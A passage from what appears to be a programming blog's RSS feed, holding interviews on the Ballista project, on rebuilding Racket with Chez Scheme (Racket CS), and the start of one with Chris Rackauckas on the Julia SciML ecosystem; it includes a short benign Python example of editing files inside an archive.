&lt;p&gt;Personally, I think that the most important goal for the Ballista project is to build a community around it. It started out as a personal side-project but I can only commit a relatively small number of hours each weekend to work on the project, and that time is better spent on writing requirements and building a community than trying to code everything myself.&lt;&#x2F;p&gt;
&lt;p&gt;To this end, I have started a weekly newsletter, named &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ballistacompute.org&#x2F;this-week-in-ballista&#x2F;&quot;&gt;“This Week in Ballista”&lt;&#x2F;a&gt;, to share news about progress and where help is needed. I am mostly spending my time on the project on tasks such as filing issues and responding to questions in Discord. I am also prototyping new features and then asking for help from the community to complete them.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;do-you-have-any-book-recommendations-on-distributed-computing&quot;&gt;Do you have any book recommendations on distributed computing?&lt;&#x2F;h4&gt;
&lt;p&gt;Last year, I wrote &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.andygrove.io&#x2F;2020&#x2F;02&#x2F;how-query-engines-work&#x2F;&quot;&gt;“How Query Engines Work”&lt;&#x2F;a&gt;, which is an introductory guide to query engines that covers distributed computing at a high level. I would be hesitant to recommend this book specifically for learning about distributed computing, though, since it doesn’t have much content on this subject yet, although I do plan to extend the content once Ballista is farther along.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Rebuilding the Racket Compiler with Chez Scheme</title>
          <pubDate>Thu, 26 Nov 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/rebuilding-the-racket-compiler-with-chez-scheme/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/rebuilding-the-racket-compiler-with-chez-scheme/</guid>
<description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/rebuilding-the-racket-compiler-with-chez-scheme/">&lt;h4 id=&quot;an-interview-on-racket-cs-with-programmers-gustavo-massaccesi-matthew-flatt&quot;&gt;An interview on Racket CS with programmers Gustavo Massaccesi and Matthew Flatt&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-so5Q8KpDmcaIAKUHU5V9mw.png&quot; alt=&quot;&quot; &#x2F;&gt;Still from a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=t09AJUK6IiM&quot;&gt;2018 talk by Matthew Flatt&lt;&#x2F;a&gt;, modified by us&lt;&#x2F;p&gt;
&lt;p&gt;Racket flaunts the title of being &lt;em&gt;the programmable programming language&lt;&#x2F;em&gt;. With extensibility at its core, it takes metaprogramming to the next level by encouraging developers to implement their own DSLs to solve the problem at hand.&lt;&#x2F;p&gt;
&lt;p&gt;Following this same principle, its development team attacks the complexity of writing a compiler by stacking layers of DSLs to implement many of its components.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, the project had many legacy components written in C that became a development bottleneck, so in 2017, Matthew Flatt made an announcement on a Racket Developers group:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-oXZFdbH7adA58JPU4Cu2tw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;groups.google.com&#x2F;g&#x2F;racket-dev&#x2F;c&#x2F;2BV3ElyfF8Y&#x2F;m&#x2F;4RSd3XbECAAJ?pli=1&quot;&gt;Source&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Chez is a Scheme implementation that was open-sourced by Cisco in 2016. Its performance is unmatched among Schemes, and it has a long history of being used in production.&lt;&#x2F;p&gt;
&lt;p&gt;To learn more about this endeavor, we contacted Gustavo Massaccesi and Matthew Flatt, who were part of what is now called the &lt;strong&gt;Racket CS&lt;&#x2F;strong&gt; project. In this interview, they explain the background and details of this project.&lt;&#x2F;p&gt;
&lt;p&gt;We’re big fans of Matthew Flatt’s work and of the Racket endeavor. For further reading, we recommend Flatt’s article &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;queue.acm.org&#x2F;detail.cfm?id=2068896&quot;&gt;Creating languages in Racket&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;gumroad.com&#x2F;l&#x2F;lop-in-racket-cultural-anthro&quot;&gt;this book&lt;&#x2F;a&gt; that interviews 38 Racket programmers, and the book &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;beautifulracket.com&#x2F;&quot;&gt;Beautiful Racket&lt;&#x2F;a&gt;, for which Flatt wrote the foreword.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;tell-us-about-racket-what-makes-it-stand-out-in-the-lisp-family&quot;&gt;&lt;strong&gt;Tell us about Racket. What makes it stand out in the LISP family?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s distinguish “Racket the language” and “Racket the project”.&lt;&#x2F;p&gt;
&lt;p&gt;The Racket language is a general-purpose, Scheme-like language with an especially rich set of constructs for extending the language — even by Scheme standards. Racket includes support for writing quick-and-dirty macros, but it also supports nicer macros with good error checking that avoid surprising errors in the expanded code. The close integration of macros and modules, an enforced phase separation between run-time and compile-time code, and the &lt;code&gt;#lang&lt;&#x2F;code&gt; mechanism for selecting the surface syntax all distinguish Racket from other Lisp variants.&lt;&#x2F;p&gt;
&lt;p&gt;Even the main Racket language is written in a simpler language, and that one is written in an even simpler language. This tower of languages makes development easier. You can look under the hood and see all the internal languages, or just ignore them and use a nice high-level language.&lt;&#x2F;p&gt;
&lt;p&gt;Less prominent, but just as important in practice for building language abstractions and composing them into large systems, are Racket’s run-time constructs: first-class control with continuation marks, custodians for simple and reliable task termination, reachability-based memory accounting, message-based parallelism via places, and Concurrent ML-style constructs for event-driven programs. Many of these constructs need support at lower levels of the runtime system, but then they can be used to build a wide variety of languages and libraries that mesh well.&lt;&#x2F;p&gt;
&lt;p&gt;The Racket project synthesizes research, production, and education efforts toward the overall language-building goal. The idea of “A Programmable Programming Language” serves all of those directions, from building student-friendly learning environments, to applying domain-specific languages, to pushing the frontiers of language design and implementation.&lt;&#x2F;p&gt;
&lt;p&gt;The main page is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;racket-lang.org&#x2F;&quot;&gt;https:&#x2F;&#x2F;racket-lang.org&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-does-it-mean-that-you-can-write-your-own-language&quot;&gt;&lt;strong&gt;What does it mean that you can write your own language?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;For example, when you install Racket, it comes with 20 or 30 additional languages. (I’m not sure if someone has counted all of them.)&lt;&#x2F;p&gt;
&lt;p&gt;There are a few “Student” languages that are designed for students. They are less powerful but have more compile-time checks to detect common beginner errors. They come in different levels, so once you master one, you can use the next one, which includes more features.&lt;&#x2F;p&gt;
&lt;p&gt;Another language is Typed Racket, which adds types to Racket expressions, so it refuses to compile unless the types check. It also uses the type information to optimize the code, so compilation is slower, but the generated code can be faster.&lt;&#x2F;p&gt;
&lt;p&gt;There are languages that implement the R5RS and R6RS versions of Scheme and many of the SRFIs, and you can install a package that adds the R7RS-small version.&lt;&#x2F;p&gt;
&lt;p&gt;And there are also languages with a very different syntax, such as a complete implementation of Algol 60.&lt;&#x2F;p&gt;
&lt;p&gt;All these languages share the same backend, and you can call libraries written in one language from any of the others: the languages included in the distribution, the additional languages you can download as packages, or the languages you create.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-s-the-difference-between-racket-and-scheme&quot;&gt;&lt;strong&gt;What’s the difference between Racket and Scheme?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Racket started out as a Scheme implementation, and we would still call it “a Scheme.” Even though it does not fit a Scheme standard, it’s obviously derived from Scheme. There are many specific differences, such as the fact that &lt;code&gt;cons&lt;&#x2F;code&gt; always creates an immutable pair in Racket, but the main difference is philosophy: Scheme is meant to be a small language that gives you just enough to express lots of things. Racket is meant to be a big language, and while it gives you the same core pieces (and more) that can express lots of things, it also codifies the way many things are done to enable more cooperating libraries and languages.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-chez-scheme-how-is-it-different-from-other-scheme-implementations&quot;&gt;&lt;strong&gt;What is Chez Scheme, how is it different from other Scheme implementations?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Chez Scheme is one of the oldest Scheme implementations, and its evolution informed many parts of the Scheme standard through R6RS. (Racket’s influence on the Scheme standard, in contrast, is limited to aspects of the R6RS library design.) Chez Scheme is a relatively small language, but like all instantiations of Scheme, the implementation provides a lot more than the standard specifies.&lt;&#x2F;p&gt;
&lt;p&gt;Chez Scheme’s biggest claim to fame is its performance. It has always been among the best-performing Scheme implementations. Its object-tagging and allocation regime, its hybrid stack–heap implementations of continuations, and its compiler structure all remain state-of-the-art, even in 2020.&lt;&#x2F;p&gt;
&lt;p&gt;For most of its existence, Chez Scheme was a proprietary, closed-source implementation, but it became open source in mid-2016. As it happens, we started considering a new Racket reimplementation around the start of 2017.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-did-you-choose-chez-scheme-over-other-schemes-to-rebuild-racket&quot;&gt;&lt;strong&gt;Why did you choose Chez Scheme over other Schemes to rebuild Racket?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The biggest weaknesses of the Racket BC (“before Chez”) implementation are its back-end compiler structure, its inefficient internal calling conventions (over-adapted to C), and its poor implementation of first-class continuations. Those are exactly the strengths of Chez Scheme. Furthermore, Racket’s evaluation model was always closely aligned with Chez Scheme’s, such as in the emphasis on interactive evaluation and compilation.&lt;&#x2F;p&gt;
&lt;p&gt;It was clear up front that Chez Scheme lacked significant features that Racket needs, such as support for continuation marks and reachability-based memory accounting. However, the high quality of the Chez Scheme design and implementation, in contrast to old Racket’s implementation, made adapting Chez Scheme more appealing than retrofitting Racket’s old implementation further.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;why-reimplement-with-chez-scheme-to-reduce-the-c-part-instead-of-implementing-the-c-stuff-in-racket&quot;&gt;&lt;strong&gt;Why reimplement with Chez Scheme to reduce the C part instead of implementing the C stuff in Racket?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Mostly, we did reimplement the C stuff in Racket. The I&#x2F;O subsystem, the concurrency subsystem (which includes the scheduler for “green” threads, Concurrent ML-style events, and custodians), and the regexp matcher were all rewritten in Racket. Those pieces followed the rewrite of the macro expander in Racket. Other things that needed to be moved out of C, such as the compiler and the extensive support for numbers that Racket inherited from Scheme, were already written in Scheme in Chez Scheme’s implementation.&lt;&#x2F;p&gt;
&lt;p&gt;A big part of the process was to understand what to implement in Racket, what in Chez Scheme, and what new layers to introduce in translation. This work and reorganization benefits other Racket implementation efforts, such as Pycket and RacketScript.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;besides-improving-maintainability-what-are-the-advantages-of-building-racket-with-cs-over-c&quot;&gt;&lt;strong&gt;Besides improving maintainability, what are the advantages of building Racket with CS over C?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;With the exception of the garbage collector and similar low-level parts of the runtime system, much of Racket’s implementation benefits from higher-level abstractions. Writing a macro expander in C was a particularly poor choice, since higher-level abstractions obviously make tree manipulations easier, but the same reasons apply for the I&#x2F;O layer or numeric primitives. Even the garbage collector in [the Racket variant of] Chez Scheme is now half implemented by a specification and compiler that are written in Scheme.&lt;&#x2F;p&gt;
&lt;p&gt;The other big advantage is that the Racket community has a lot of Racket programmers, not C programmers. It’s easier to convince a fan of Racket to look at some code in Racket or Chez Scheme and try to find some bug or a new feature to contribute. The people that like to read and write code in C are probably making contributions to a C compiler.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-were-the-most-challenging-parts-to-implement&quot;&gt;&lt;strong&gt;What were the most challenging parts to implement?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The most challenging part is not really one part, but the overall scale. Racket is a big language, and it all has to work the same in the new implementation. That means not just getting the right result and&#x2F;or a specific kind of error message, but getting results with the same or better performance characteristics. For example, if a macro generates a giant expansion that nevertheless compiles in reasonable time in Racket BC, then it needs to compile in reasonable time in Racket CS.&lt;&#x2F;p&gt;
&lt;p&gt;When it comes to specific pieces that we had to implement, perhaps the most challenging were adding type reconstruction to the compiler, adding support for continuation marks, allowing record values to act as procedures, reimplementing Racket’s I&#x2F;O, and upgrading Chez Scheme’s garbage collector to support memory accounting, in-place marking for large heaps, and parallelism.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-improvements-have-been-made-since-the-paper-came-out&quot;&gt;&lt;strong&gt;What improvements have been made since the paper came out?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;There have been a lot of fixes of small bugs and incompatibilities between Racket BC and Racket CS. Also the performance of Racket CS has improved, and now both variants have a more consistently similar end-to-end performance. The speed of generated code was rarely the problem with Chez Scheme as a backend, but the layers newly implemented in Racket needed lots of tuning. So, the things that used to be faster in BC are now generally about as fast in CS, while things that have been faster in CS are even faster.&lt;&#x2F;p&gt;
&lt;p&gt;One of the most important improvements at the Chez Scheme level is flonum unboxing. Until recently, floating-point numbers were stored in a box-like object under the hood, so that they could be used in a vector or other container that expects a reference to an object. Now, in many cases, the compiler detects that the box is not necessary and skips it. That reduces the number of allocations and increases the speed of programs that use a lot of floating-point numbers.&lt;&#x2F;p&gt;
&lt;p&gt;The other big area of improvement was in the garbage collector. When we started Racket CS, Chez Scheme had an admirably simple collector that performed very well on traditional Scheme programs. But Racket needed a lot more functionality from the collector. We’ve improved support for large heaps, for GUI and game-like situations that benefit from incremental collection, and for programs with parallelism.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;do-you-know-of-any-uses-of-racket-on-cs-outside-academia&quot;&gt;&lt;strong&gt;Do you know of any uses of Racket on CS outside academia?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;You can download Racket CS from the download page, and it is a drop-in replacement for the current version of Racket BC. Both Racket BC and Racket CS include all the libraries and the IDE, which is also written in Racket. All code written in Racket should run without changes in the BC or CS versions, except for some corners of the foreign-function interface.&lt;&#x2F;p&gt;
&lt;p&gt;Gustavo used it in the university to edit and move a quiz from one Moodle server to another. The mdz files are like .tar.gz files, so you can use the standard libraries in Racket to uncompress them, edit the XML files inside, and then repackage the result in a new mdz file. (Does this count as “outside academia”?)&lt;&#x2F;p&gt;
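The workflow described above (treat the archive as a .tar.gz, rewrite the XML members, repackage) was done with Racket's standard libraries; as a rough sketch of the same idea, here is a Python analogue. The file names, the sample XML payload, and the `rewrite_archive` helper are all hypothetical, for illustration only:

```python
# Sketch: copy a .tar.gz-style archive, transforming its .xml members.
import io
import tarfile

def rewrite_archive(src_path, dst_path, transform):
    """Copy the archive, applying `transform` to every .xml member."""
    with tarfile.open(src_path, "r:gz") as src, \
         tarfile.open(dst_path, "w:gz") as dst:
        for member in src.getmembers():
            data = src.extractfile(member).read() if member.isfile() else b""
            if member.name.endswith(".xml"):
                data = transform(data)
                member.size = len(data)  # size must match the new payload
            dst.addfile(member, io.BytesIO(data))

# Build a tiny sample archive first (a stand-in for a real quiz export).
with tarfile.open("quiz.mdz", "w:gz") as t:
    payload = b"<quiz server='old.example.edu'/>"
    info = tarfile.TarInfo("quiz.xml")
    info.size = len(payload)
    t.addfile(info, io.BytesIO(payload))

# Edit the XML inside and repackage, e.g. to point at a new server.
rewrite_archive("quiz.mdz", "quiz-fixed.mdz",
                lambda xml: xml.replace(b"old.example.edu", b"new.example.edu"))

with tarfile.open("quiz-fixed.mdz", "r:gz") as t:
    print(t.extractfile("quiz.xml").read())  # the edited XML
```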
&lt;p&gt;The biggest site using Racket is Hacker News (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&quot;&gt;https:&#x2F;&#x2F;news.ycombinator.com&lt;&#x2F;a&gt;), a forum about programming and related topics. It is written in their own language, Arc, which is implemented in Racket. They have more than 5.5M hits a day and somewhere between 4M and 5M unique visitors a month. They are using the BC version, though.&lt;&#x2F;p&gt;
&lt;p&gt;There is a list of other sites and organizations that use Racket at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;racket&#x2F;racket&#x2F;wiki&#x2F;Organizations-using-Racket&quot;&gt;https:&#x2F;&#x2F;github.com&#x2F;racket&#x2F;racket&#x2F;wiki&#x2F;Organizations-using-Racket&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;to-target-cs-you-ended-up-patching-the-language-to-accommodate-its-differences-with-racket-was-that-the-intention-from-the-beginning-what-was-the-biggest-difference-between-the-two-languages&quot;&gt;&lt;strong&gt;To target CS, you ended up patching the language to accommodate its differences with Racket, was that the intention from the beginning? What was the biggest difference between the two languages?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;This possibility was considered from the beginning. There are some differences of opinion between Racket and Chez Scheme, so sooner or later some change that is useful for Racket was bound not to be useful in Chez Scheme.&lt;&#x2F;p&gt;
&lt;p&gt;For example, Racket is more strict in checking that a function returns a single value in positions that expect a single value. This case is undefined in the Scheme standard, so Chez Scheme sometimes ignores it. In the common case where the function actually returns a single value, Chez Scheme may be slightly faster, and in the other cases Racket may report a better error. It’s a design decision, and each team has different preferences. So the version of Chez Scheme in Racket has some additional checks to track single-return expressions and avoid the unnecessary checks when possible.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;is-there-a-use-case-the-vm-is-optimized-for&quot;&gt;&lt;strong&gt;Is there a use case the VM is optimized for?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;It would be fair to say that the Chez Scheme runtime system is optimized for functional programming. There’s a write barrier on object modifications, for example, and the compiler is happier when variables are not mutated. It would also be fair to say that it’s designed for settings with plenty of memory and computing power, and not more constrained, embedded settings.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-do-you-hope-to-improve-in-the-future-i-e-new-features-better-performance&quot;&gt;&lt;strong&gt;What do you hope to improve in the future (i.e. new features, better performance)?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Gustavo’s contribution in this rewrite has been a type-recovery pass for the patched version of Chez Scheme used in Racket. It reduces the number of run-time type checks, so the final code is faster. There is still a lot of room to make the translation from Racket to Chez Scheme more optimizer-friendly, and the optimization pass more translation-friendly, so I expect performance gains in this area next year. Also, we can improve the cooperation with the high-level parts of Racket that use types, like the contract system and Typed Racket.&lt;&#x2F;p&gt;
&lt;p&gt;Writing the optimization passes in Chez Scheme opens a lot of possibilities; for example, Gustavo wants to add some escape analysis and use that information to avoid copies, the creation of temporary structs, and other similar reductions. It was too scary to try that in C, but it looks more feasible in Chez Scheme. [Probably in 2022.]&lt;&#x2F;p&gt;
&lt;p&gt;Matthew has run out of immediate tasks, and he is hoping to spend less time at the level of the compiler and runtime system. Now that Racket CS has generally caught up and stabilized, he hopes to go back more to language design via the Rhombus project.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-there-plans-to-expand-racket-in-which-areas-where-would-you-like-to-see-racket-in-5-years&quot;&gt;&lt;strong&gt;Are there plans to expand Racket? In which areas? Where would you like to see Racket in 5 years?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;The Rhombus project is an experiment at starting fresh with the surface language and library design while preserving all of the language-building constructs, compilation pipeline, and runtime system that we now have in place in Racket. It’s still early — and still earlier than we thought it might be, since Racket CS development continued to dominate our efforts — but if this design succeeds, then we expect that to be the next direction for Racket.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-has-the-community-reception-been-to-racket-cs&quot;&gt;&lt;strong&gt;How has the community reception been to Racket CS?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Initially, some people were afraid of the performance drop for adding a new layer between Racket and the hardware. The initial version was slower, but the current version has a similar speed, and in many benchmarks it’s faster. Most likely, the January release of Racket will be version 8.0 with Racket CS (based on Chez Scheme) as the default implementation.&lt;&#x2F;p&gt;
&lt;p&gt;Other people were worried that the development of the low-level part of Racket would be slowed down for some time while the new version was being made. Now that the CS version has almost equivalent performance, hopefully the increase in development speed in the CS version will compensate for the delay. Anyway, Racket is a big project, so while the CS version was being developed, other areas saw a lot of improvement, like new libraries and a more efficient contract system, and all of these new features are available in both versions.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;on-a-different-note-what-books-would-you-recommend-to-a-programmer&quot;&gt;&lt;strong&gt;On a different note, what books would you recommend to a programmer?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;We’d certainly recommend &lt;em&gt;How to Design Programs&lt;&#x2F;em&gt; (&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;htdp.org&quot;&gt;https:&#x2F;&#x2F;htdp.org&lt;&#x2F;a&gt;). While it’s mainly intended for beginning programmers, it can also provide a crash course in functional programming for programmers who do not already have a lot of experience with it. &lt;em&gt;Essentials of Programming Languages&lt;&#x2F;em&gt; by Dan Friedman and Mitch Wand is a classic for learning about programming languages from the same perspective that informs HtDP.&lt;&#x2F;p&gt;
&lt;p&gt;While it’s not about programming directly, Matthew recommends &lt;em&gt;Working in Public: The Making and Maintenance of Open Source Software&lt;&#x2F;em&gt; by Nadia Eghbal. The book is a lucid reflection on the history and state of open-source software — partly the idea of open source, but especially how that idea has played out in practice.&lt;&#x2F;p&gt;
&lt;p&gt;Gustavo wants to recommend &lt;em&gt;Gödel, Escher, Bach: an Eternal Golden Braid&lt;&#x2F;em&gt;. It is not related to Racket, but it has a few nice discussions about transforming formulas&#x2F;code into numbers&#x2F;data, which is one of the main ideas behind macros in the LISP family.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Scientific Machine Learning with Julia: the SciML ecosystem</title>
          <pubDate>Fri, 13 Nov 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/scientific-machine-learning-with-julia-the-sciml-ecosystem/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/scientific-machine-learning-with-julia-the-sciml-ecosystem/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/scientific-machine-learning-with-julia-the-sciml-ecosystem/">&lt;h4 id=&quot;interview-with-chris-rackauckas&quot;&gt;Interview with Chris Rackauckas&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-zBLCNU10DE1qv5PG4wdwbg.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We live in a complex world. For those scientists who dare to immerse themselves in that complexity and generate a deeper understanding of it, it is very common to have to deal with differential equation models that are not possible to solve without the use of a computer.&lt;&#x2F;p&gt;
&lt;p&gt;A lot of time is usually spent coding the particular differential equation for each problem. Julia SciML works to create and maintain tools that improve this process: from a framework that automates the pipeline for creating and solving problem-specific differential equations with a high-level syntax, to machine learning methods for inferring unknown components of the model, and many other functionalities.&lt;&#x2F;p&gt;
&lt;p&gt;We interviewed the creator of SciML, Chris Rackauckas, to get to know a little more about his work.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-bCCWEZqP_ORcTiLPPV13rw.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: DifferentialEquations.jl documentation&lt;&#x2F;p&gt;
&lt;h4 id=&quot;please-tell-us-a-bit-about-yourself-what-is-your-background-what-is-your-current-position&quot;&gt;Please tell us a bit about yourself. What is your background? What is your current position?&lt;&#x2F;h4&gt;
&lt;p&gt;I am an applied mathematics instructor at MIT, the Director of Scientific Research at Pumas-AI, and a senior research analyst at the University of Maryland, School of Pharmacy. My background is in numerical differential equations and systems biology; my PhD was on new methods for efficiently solving stochastic differential equations, used to model the control of randomness in the developing zebrafish hindbrain.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-sciml-why-was-it-born-and-what-s-its-purpose&quot;&gt;What is SciML? Why was it born and what’s its purpose?&lt;&#x2F;h4&gt;
&lt;p&gt;Before the “SciML” organization, there was just DifferentialEquations.jl and JuliaDiffEq, but it grew beyond a single project. There were methods for symbolically manipulating equations, sparse automatic differentiation, automated model discovery, neural PDE solvers, and even packages in Python and R for using these tools. So the name no longer fit, and we reorganized around the central principle: scientific machine learning. Scientific machine learning is a burgeoning field that mixes scientific computing, like differential equation modeling, with machine learning. That is the essence of the organization: many tools for scientific simulation with differential equation solvers, chemical reaction network tools, and N-body simulators, all of which can compose with machine learning.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-YtKzMw7VOvNbOCsOkXwU0A.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;scientific-computing-and-machine-learning-are-often-perceived-as-very-different-areas-what-would-you-say-are-the-strengths-and-weaknesses-of-each-one-and-how-does-sciml-take-advantage-of-them&quot;&gt;Scientific Computing and Machine Learning are often perceived as very different areas. What would you say are the strengths and weaknesses of each one and how does SciML take advantage of them?&lt;&#x2F;h4&gt;
&lt;p&gt;Scientific computing generally requires a lot of prior knowledge about the system. You need to be able to create a “mechanistic model”, which requires knowing the physical laws, the chemicals which react, or some other way to mathematically encode each interaction of the system. If you know this, great! Then you have a very predictive model. You might know all of the chemicals which interact but not know the reaction rates, and then 12 data points can turn this into quite a predictive model. So these models are interpretable (since it’s all about the mechanism), data efficient, etc. They are great at extrapolating too: the theory of gravity gives pretty good predictions for what happens on Earth, just as it does for the solar system and for galaxies.&lt;&#x2F;p&gt;
&lt;p&gt;Data-driven modeling, like machine learning, takes a completely opposite approach of being “data first”. You have a non-mechanistic model, and you “train” the model based on the data. This requires a lot of data, but you can do this even when you have no idea what the mechanism is. What’s the mechanism for what movie someone will want to watch next on Netflix given the previous movies they’ve seen? Einstein didn’t have a theory for that! But with big data, you can generate such a model.&lt;&#x2F;p&gt;
&lt;p&gt;Scientific machine learning is about pairing together these two paradigms. Incorporating mechanism into machine learning makes it more interpretable, more data efficient, and better able to predict beyond the training data, all without requiring that you know all of the mechanisms. We’re using this in cases like pharmacometrics, where in the first clinical trial we may not know everything about how the drug works, but we can start with a pretty good guess by using mechanistic models derived for similar drugs, and use the incoming data to train models that transform the prior model towards the data.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-ihyMT0ujkdDopf3M8eiXUw.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-neural-odes-when-is-it-appropiate-to-work-with-one-do-you-fear-that-accuracy-or-interpretability-is-lost-by-introducing-a-neural-network-as-part-of-the-equation-aren-t-there-other-learning-methodologies-suited-for-such-a-thing&quot;&gt;What are Neural ODEs? When is it appropriate to work with one? Do you fear that accuracy or interpretability is lost by introducing a Neural Network as part of the equation? Aren’t there other learning methodologies suited for such a thing?&lt;&#x2F;h4&gt;
&lt;p&gt;Neural Ordinary Differential Equations or Neural ODEs are ordinary differential equations defined by a neural network. Indeed the result is less interpretable than having a mechanistic physical model, but it allows for the model to be learned directly from data. With a neural network, you are not just estimating parameters but estimating functions. As a middle ground, we created the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;2001.04385&quot;&gt;universal differential equation&lt;&#x2F;a&gt;, which is a partially mechanistic model where the neural networks fill in areas of the model which are unknown or have a lot of uncertainty. In this sense, there is more of a continuum between the data-driven and mechanistic models.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;currently-there-exist-many-differential-equations-solvers-why-do-you-think-this-is-the-case-is-there-a-way-to-choose-the-best-one-for-each-situation&quot;&gt;Currently, there exist many differential equation solvers. Why do you think this is the case? Is there a way to choose the best one for each situation?&lt;&#x2F;h4&gt;
&lt;p&gt;We created an automated algorithm chooser in order to mitigate this issue. If you do ‘solve(prob)’ (i.e. don’t specify a solver algorithm), it will choose one for you. Then you can give it hints to go down different branches. As time goes on I think we will keep refining that algorithm and pushing more people towards that.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-key-reasons-the-sciml-differential-equations-solver-is-so-fast-how-does-it-differ-from-others-how-influential-was-writing-it-in-julia&quot;&gt;What are the key reasons the SciML Differential Equations solver is so fast? How does it differ from others? How influential was writing it in Julia?&lt;&#x2F;h4&gt;
